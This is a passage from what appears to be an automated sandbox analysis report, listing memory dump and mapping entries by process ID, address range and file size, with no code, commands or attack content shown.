                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/2512-221-0x0000000003C70000-0x0000000003C71000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/2512-236-0x0000000003D10000-0x0000000003D11000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/2512-248-0x0000000003D70000-0x0000000003D71000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/2512-215-0x0000000003A60000-0x0000000003A9C000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  240KB

                                                                                                                                                                                                                • memory/2512-239-0x0000000003D20000-0x0000000003D21000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/2512-246-0x0000000003D60000-0x0000000003D61000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/2512-241-0x0000000003D40000-0x0000000003D41000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/2512-220-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/2512-244-0x0000000003D50000-0x0000000003D51000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/2676-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/2680-180-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/2688-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/2712-390-0x000001D700370000-0x000001D7003E4000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  464KB

                                                                                                                                                                                                                • memory/2712-387-0x000001D7001B0000-0x000001D7001FD000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  308KB

                                                                                                                                                                                                                • memory/2768-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/2784-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/2880-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/2880-222-0x0000000004790000-0x00000000047D8000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  288KB

                                                                                                                                                                                                                • memory/2880-231-0x0000000000400000-0x0000000002B6B000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  39.4MB

                                                                                                                                                                                                                • memory/3020-352-0x0000000000DC0000-0x0000000000DD5000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  84KB

                                                                                                                                                                                                                • memory/3096-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/3164-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/3168-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/3168-205-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  436KB

                                                                                                                                                                                                                • memory/3192-287-0x00000000078A0000-0x00000000078A1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/3192-269-0x0000000006E80000-0x0000000006E81000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/3192-219-0x0000000004812000-0x0000000004813000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/3192-280-0x0000000007650000-0x0000000007651000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/3192-216-0x0000000004810000-0x0000000004811000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/3192-211-0x0000000006EF0000-0x0000000006EF1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/3192-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/3192-300-0x00000000079F0000-0x00000000079F1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/3192-210-0x0000000006880000-0x0000000006881000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/3356-238-0x0000000002160000-0x0000000002169000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  36KB

                                                                                                                                                                                                                • memory/3356-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/3356-243-0x0000000000400000-0x0000000002145000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  29.3MB

                                                                                                                                                                                                                • memory/3736-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/3768-381-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/3824-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/3844-255-0x00000000002E0000-0x00000000002E1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/3844-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/3960-207-0x0000000000090000-0x0000000000091000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/3960-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/3972-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/3980-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4012-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4012-535-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4036-195-0x0000000000B60000-0x0000000000B61000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4036-204-0x0000000000C80000-0x0000000000C9C000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  112KB

                                                                                                                                                                                                                • memory/4036-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4036-382-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4036-218-0x0000000000D00000-0x0000000000D02000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4036-184-0x0000000000640000-0x0000000000641000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4036-209-0x0000000000B70000-0x0000000000B71000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4060-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4068-223-0x00000285C11A0000-0x00000285C121E000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  504KB

                                                                                                                                                                                                                • memory/4068-291-0x00000285A75F5000-0x00000285A75F7000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4068-206-0x00000285A75F0000-0x00000285A75F2000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4068-297-0x00000285A75F4000-0x00000285A75F5000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4068-201-0x00000285A5B60000-0x00000285A5B6B000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  44KB

                                                                                                                                                                                                                • memory/4068-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4068-189-0x00000285A5680000-0x00000285A5681000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4068-229-0x00000285A75F2000-0x00000285A75F4000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4112-385-0x0000000004670000-0x00000000046CF000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  380KB

                                                                                                                                                                                                                • memory/4112-383-0x000000000456A000-0x000000000466B000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                • memory/4112-371-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4140-308-0x000000001B970000-0x000000001B972000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4140-262-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4140-265-0x0000000000E80000-0x0000000000E81000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4152-533-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4200-306-0x00000000008A0000-0x00000000008A1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4200-313-0x0000000002090000-0x00000000020C0000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  192KB

                                                                                                                                                                                                                • memory/4200-286-0x0000000000190000-0x0000000000191000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4200-335-0x000000001ADC0000-0x000000001ADC2000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4200-267-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4200-320-0x0000000000A50000-0x0000000000A51000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4212-273-0x0000000000B40000-0x0000000000B41000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4212-283-0x000000001B890000-0x000000001B892000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4212-268-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4224-534-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4324-318-0x0000000001550000-0x0000000001551000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4324-321-0x0000000001560000-0x000000000156C000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  48KB

                                                                                                                                                                                                                • memory/4324-277-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4324-295-0x0000000000EB0000-0x0000000000EB1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4324-333-0x0000000003180000-0x0000000003181000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4340-370-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4368-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4372-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4372-290-0x00000000000F0000-0x00000000000F1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4372-299-0x0000000000830000-0x0000000000832000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4388-376-0x00007FF709C04060-mapping.dmp
                                                                                                                                                                                                                • memory/4492-314-0x000000001BC10000-0x000000001BC12000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4492-296-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4492-304-0x0000000000ED0000-0x0000000000ED1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4548-528-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4604-339-0x0000000000730000-0x0000000000732000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4604-309-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4616-527-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4648-327-0x0000000004B80000-0x0000000004B81000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4648-337-0x0000000004AE0000-0x0000000004FDE000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  5.0MB

                                                                                                                                                                                                                • memory/4648-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4648-319-0x0000000000220000-0x0000000000221000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4648-334-0x0000000004D30000-0x0000000004D31000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4648-342-0x0000000004AB0000-0x0000000004AC8000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  96KB

                                                                                                                                                                                                                • memory/4728-322-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4728-324-0x0000000000EB0000-0x0000000000EB1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4728-336-0x0000000001610000-0x0000000001612000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4824-532-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4840-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/4840-331-0x0000000000C70000-0x0000000000C71000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/4840-341-0x000000001B6D0000-0x000000001B6D2000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                • memory/4976-338-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5004-340-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5004-354-0x0000000000BE0000-0x0000000000BE1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/5040-364-0x00000000051F0000-0x00000000051F1000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                • memory/5040-343-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5076-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5104-348-0x000000000041C5E6-mapping.dmp
                                                                                                                                                                                                                • memory/5104-368-0x0000000005730000-0x0000000005D36000-memory.dmp
                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                • memory/5288-398-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5296-397-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5628-426-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5728-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                • memory/5812-531-0x0000000000000000-mapping.dmp